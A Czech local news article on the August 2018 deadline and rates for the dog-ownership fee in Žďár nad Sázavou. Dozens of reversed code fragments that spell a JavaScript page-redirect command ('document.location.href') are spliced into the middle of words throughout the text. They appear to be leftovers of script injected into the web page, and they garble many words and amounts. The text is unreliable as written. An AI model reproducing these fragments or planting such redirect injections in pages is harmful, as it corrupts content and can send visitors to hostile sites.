Rainbow page separator

Do konce srpna musí lidé ve Žďáře zaplatit poplatek za psy

Pondělí, 6. srpna 2018

Poplatek za žďárské psy je splatný do konce srpna

Žďár nad Sázavou / Do konce srpna jsou držitelé psů ve Žďáře povinni uhradit poplatek za druhé pololetí. Ten je možné zaplatit ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově nebo platební kar[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou v pokladně městského
úřadu, případně bezho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovostní platbou pod přiděleným variabilním symbolem.
Platba poplatku se vztahuje na držitele psů s trvalým pobytem v by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domech a v ohlašovně úřadu, držitele více psů i držitele zvířat v sídle podnikání, kdy je roční sazba poplatku vyšší než pět set korun.
V domech s jedním či dvěma byty je chovatel povinen uhradit 300 korun ročně za jednoho psa, za druhého a každého dalšího pak 900 korun. V by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domech jedno zvíře vyjde na 900 korun, každé další stejného držitele na dva tisíce.
V místních částech Žďáru se platí s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to korun za jednoho psa v domě, druhý a další vychází na dvě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky. V domku s více než dvěma byty jde o částku ve výši 200 korun za jedno zvíře a 500 korun za další. Osoby s trvalým bydlištěm v sídle ohlašovny jsou povinny za jedno zvíře zaplatit 600 korun a za další čtrnáct s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek ročně. V nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostech s evidenčním číslem činí poplatek za prvního psa s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to korun ročně a tři sta za každého dalšího. Na zvíře přihlášené v sídle podnikání se vztahuje poplatek ve výši 900 korun za rok, za druhého a každého dalšího psa jde o dva tisíce.